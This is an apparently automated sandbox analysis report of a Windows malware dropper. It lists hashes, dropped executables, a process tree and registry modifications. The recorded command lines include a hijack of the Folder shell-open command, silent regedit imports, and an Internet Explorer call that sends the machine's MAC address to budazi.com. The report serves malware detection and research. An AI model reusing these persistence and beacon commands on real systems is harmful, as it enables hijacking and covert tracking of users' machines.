Analysis
-
max time kernel
15s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
25/12/2023, 09:31
Static task
static1
Behavioral task
behavioral1
Sample
148d64f2b0063fe75bca426aceb765ae.exe
Resource
win7-20231215-en
General
-
Target
148d64f2b0063fe75bca426aceb765ae.exe
-
Size
893KB
-
MD5
148d64f2b0063fe75bca426aceb765ae
-
SHA1
e0d96bd0e898b4738001559d15cf4007e959a859
-
SHA256
3f5b6dc7430bc4be4cac99270350548ca5c8a1d4ccf1c0d10233bfbf00f09b3c
-
SHA512
3f2b93db270d6b71efadebf1079635e70efe753c4b4917402c1c821707d2336144d67c954c598418b8a2c2049284b0b9b4f7b06ddf15588f6aecf0f5fcb553ef
-
SSDEEP
24576:DIrFeivrzM+h+sMNv52AXrxgEpy46RyuhLoBi:DIrdH+sMXpd9UjbhLoBi
Malware Config
Signatures
-
resource yara_rule behavioral2/files/0x000800000002320d-40.dat aspack_v212_v242 behavioral2/files/0x0006000000023210-52.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation 148d64f2b0063fe75bca426aceb765ae.exe Key value queried \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000\Control Panel\International\Geo\Nation budazi.exe -
Executes dropped EXE 6 IoCs
pid Process 2020 notice.exe 2196 budazi.exe 1508 dd.exe 3376 TXFlatform.exe 1540 IEXPLORE.EXE 1576 snss.exe -
resource yara_rule behavioral2/memory/4608-180-0x0000000000400000-0x00000000004B8000-memory.dmp upx behavioral2/memory/4608-176-0x0000000000400000-0x00000000004B8000-memory.dmp upx behavioral2/memory/2624-201-0x0000000000400000-0x0000000000496000-memory.dmp upx behavioral2/memory/2624-202-0x0000000000400000-0x0000000000496000-memory.dmp upx -
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/memory/4608-180-0x0000000000400000-0x00000000004B8000-memory.dmp autoit_exe behavioral2/memory/4608-176-0x0000000000400000-0x00000000004B8000-memory.dmp autoit_exe behavioral2/memory/2624-202-0x0000000000400000-0x0000000000496000-memory.dmp autoit_exe -
Drops file in System32 directory 5 IoCs
description ioc Process File created C:\Windows\SysWOW64\csys.dat snss.exe File opened for modification C:\Windows\SysWOW64\f1drc1nr.dll dd.exe File opened for modification C:\Windows\SysWOW64\TXFlatform.exe dd.exe File created C:\Windows\SysWOW64\sysini.ini IEXPLORE.EXE File opened for modification C:\Windows\SysWOW64\sysini.ini snss.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\snss.exe IEXPLORE.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 43 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Open(&O)\Command regedit.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open dd.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Open(&O)\Command\ = "\"C:\\Program Files\\Internet Explorer\\\\IEXPLORE.EXE\" %1 http://www.budazi.com/" regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Z regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016} regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Z\ = "??(&D)" regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016} regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\DefaultIcon regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Open(&O)\Command regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\??(&R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open dd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Open(&O) regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\??(&R)\Command\ = "Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl" regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Open(&O) regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Z\Command regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\??(&R) regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Open(&O)\ = "????(&H)" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\??(&R)\Command regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\ShellFolder regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\ = "Internet Explorer" regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Z\ = "??(&D)" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command dd.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Z\Command\ = "Rundll32.exe" regedit.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command dd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Z\Command\ = "Rundll32.exe" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\??(&R) regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\ShellFolder\Attributes = "10" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell dd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shell\open\command\ = "C:\\Windows\\SysWow64\\TXFlatform.exe %SystemRoot%\\Explorer.exe /idlist,%I,%L" dd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\ = "Internet Explorer" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" regedit.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Open(&O)\Command\ = "\"C:\\Program Files\\Internet Explorer\\\\IEXPLORE.EXE\" %1 http://www.budazi.com/" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Z regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\DefaultIcon\ = "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE" regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\ShellFolder regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\DefaultIcon regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Z\Command regedit.exe Set value (str) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\Open(&O)\ = "????(&H)" regedit.exe Key created \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\Shell\??(&R)\Command regedit.exe Set value (int) \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\WOW6432Node\CLSID\{C42EB5A1-0EED-E549-91B0-153485860016}\ShellFolder\Attributes = "10" regedit.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder dd.exe -
Runs .reg file with regedit 2 IoCs
pid Process 1400 regedit.exe 4988 regedit.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 3376 TXFlatform.exe 3376 TXFlatform.exe 3376 TXFlatform.exe 3376 TXFlatform.exe 3376 TXFlatform.exe 3376 TXFlatform.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeRestorePrivilege 1508 dd.exe Token: SeBackupPrivilege 1508 dd.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2020 notice.exe 1508 dd.exe 3376 TXFlatform.exe 1540 IEXPLORE.EXE 1576 snss.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 4780 wrote to memory of 2020 4780 148d64f2b0063fe75bca426aceb765ae.exe 91 PID 4780 wrote to memory of 2020 4780 148d64f2b0063fe75bca426aceb765ae.exe 91 PID 4780 wrote to memory of 2020 4780 148d64f2b0063fe75bca426aceb765ae.exe 91 PID 4780 wrote to memory of 2196 4780 Process not Found 96 PID 4780 wrote to memory of 2196 4780 Process not Found 96 PID 4780 wrote to memory of 2196 4780 Process not Found 96 PID 2196 wrote to memory of 1508 2196 budazi.exe 100 PID 2196 wrote to memory of 1508 2196 budazi.exe 100 PID 2196 wrote to memory of 1508 2196 budazi.exe 100 PID 1508 wrote to memory of 5076 1508 dd.exe 97 PID 1508 wrote to memory of 5076 1508 dd.exe 97 PID 1508 wrote to memory of 5076 1508 dd.exe 97 PID 5076 wrote to memory of 1400 5076 cmd.exe 98 PID 5076 wrote to memory of 1400 5076 cmd.exe 98 PID 5076 wrote to memory of 1400 5076 cmd.exe 98 PID 1508 wrote to memory of 3376 1508 dd.exe 104 PID 1508 wrote to memory of 3376 1508 dd.exe 104 PID 1508 wrote to memory of 3376 1508 dd.exe 104 PID 2196 wrote to memory of 1540 2196 budazi.exe 121 PID 2196 wrote to memory of 1540 2196 budazi.exe 121 PID 2196 wrote to memory of 1540 2196 budazi.exe 121 PID 1540 wrote to memory of 1576 1540 IEXPLORE.EXE 106 PID 1540 wrote to memory of 1576 1540 IEXPLORE.EXE 106 PID 1540 wrote to memory of 1576 1540 IEXPLORE.EXE 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\148d64f2b0063fe75bca426aceb765ae.exe"C:\Users\Admin\AppData\Local\Temp\148d64f2b0063fe75bca426aceb765ae.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\notice.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\notice.exe" /S2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\budazi.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\budazi.exe" /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2196 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\dd.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\dd.exe"3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Windows\SysWOW64\TXFlatform.exeC:\Windows\system32\TXFlatform.exe C:\Users\Admin\AppData\Local\Temp\RarSFX1\dd.exe===4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3376 -
C:\Windows\SysWOW64\2011\smss.exeC:\Windows\system32\2011\smss.exe5⤵PID:208
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\kk.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\kk.exe"3⤵PID:1540
-
C:\Program Files (x86)\snss.exe"C:\Program Files (x86)\snss.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1576
-
-
C:\Windows\SysWOW64\Regsvr32.exeRegsvr32.exe /s "C:\Windows\system32\Thunder.dll"4⤵PID:4808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123.bat" "4⤵PID:544
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\OQ.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\OQ.exe" /S2⤵PID:2224
-
C:\WINDOWS\SysWOW64\all.exe"C:\WINDOWS\system32\all.exe" /s3⤵PID:4608
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\down.vbs"2⤵PID:4980
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\tjmy.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\tjmy.exe" /S2⤵PID:2624
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\a1g.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\a1g.exe" /S2⤵PID:1088
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX2\bdxg.vbs"3⤵PID:4872
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c regedit /s "C:\Users\Admin\AppData\Local\Temp\TempIE.reg"1⤵
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\regedit.exeregedit /s "C:\Users\Admin\AppData\Local\Temp\TempIE.reg"2⤵
- Modifies registry class
- Runs .reg file with regedit
PID:1400
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.budazi.com/xtj/get.asp?mac=4E55496B34AD&makedate=QM00013&comput=家庭机&ver=98&userid=00221⤵PID:1876
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1876 CREDAT:17410 /prefetch:22⤵PID:4220
-
-
C:\WINDOWS\SysWOW64\regedit.exeregedit /s reg.reg1⤵
- Runs .reg file with regedit
PID:4988
-
C:\Program Files (x86)\Internet Explorer\Iexplore.exe"C:\Program Files (x86)\Internet Explorer\Iexplore.exe" http://www.iydy.cn/tjmy.html1⤵PID:2888
-
C:\Program Files\Internet Explorer\IEXPLORE.EXE"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.iydy.cn/tjmy.html2⤵PID:4152
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4152 CREDAT:17410 /prefetch:21⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1540
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
17KB
MD55a34cb996293fde2cb7a4ac89587393a
SHA13c96c993500690d1a77873cd62bc639b3a10653f
SHA256c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee
-
Filesize
178KB
MD5f71956d94027923378ebb9df38461324
SHA12139baed7921bdc798ffd1554f5fabe8baa5949b
SHA2560aaa5060d603374a46ac2c3b91047555b3c0d50ee9defc81135cd71fdf8f1e56
SHA512d6ce4178c3e77c6d8d7d9bdd3fd8401e7990f6e3bebece73221b24c9d7958704156dbcbf2d3f1c2fcd08507ea77250777a6d2ff675d3f06045ebeddfadefcb2b
-
Filesize
16KB
MD5579961d94af1601374c82ec65a5078fc
SHA1bc3b55defc1fe6d28b38ba3596f781d851af4dd7
SHA2564f9a9635687f098cdf51ac288f8aea27d90d55c67a8924aa33232f98ef606731
SHA51266cd24bba64f5fde711e7df8819783c4730cdb41bdd65c5ac4c9bb26ee93114cad147165543433226799e47444a518b7e6bc826d705b040e71333dec6ee19bc5
-
Filesize
44KB
MD501c09024c507462b1321614f6ede372d
SHA1d5a8ba3157bc9ee6a4cbb63955dbcdb4cc76403c
SHA256b71d7ede04be792374940a5b9011a5737e145113ba45c3f6cc1e5fb18b39c79a
SHA512dfe3b2b853b44e6d0f073d819bb223f209b3ed024cae074e1d5139709be83e294fcb3874d7f174af14cb8fcb0d229c37f293586de2401d68b036810f2c049a6b
-
Filesize
2KB
MD59407c7672b6715638e6c9142ddbbc42d
SHA111610ae36947b5d669da7b0165c249a44e6de2d3
SHA256ba0451385a1fd8f461e2dde71b37e9e9a353430fa20aba6d8a5a9191266181d7
SHA512de1fe3c2b09f904fb40cbc421297e81809caa2b25bac0bc13a8e5a6334dc59d4ed9cd88f3ba50a7389a73706c4e9f0dc8ad0b56a151057f775a4359faab21711
-
Filesize
17KB
MD5a199f12ed392918eef6e9834b2c20d0e
SHA1b717b647ce9be683e06b7c25a52f0682178268af
SHA2561a641daf41456fae6d21eb582e5621925cba68bb97200926d67721b068165652
SHA512b8786d0653d96e767bfb04b9c24f5a962d179e8f96ee8ca92eaf15a3f704fbbd87ebfe9614c5f895843836e1935e770ea6e6a4949fe48292233d873698a87a58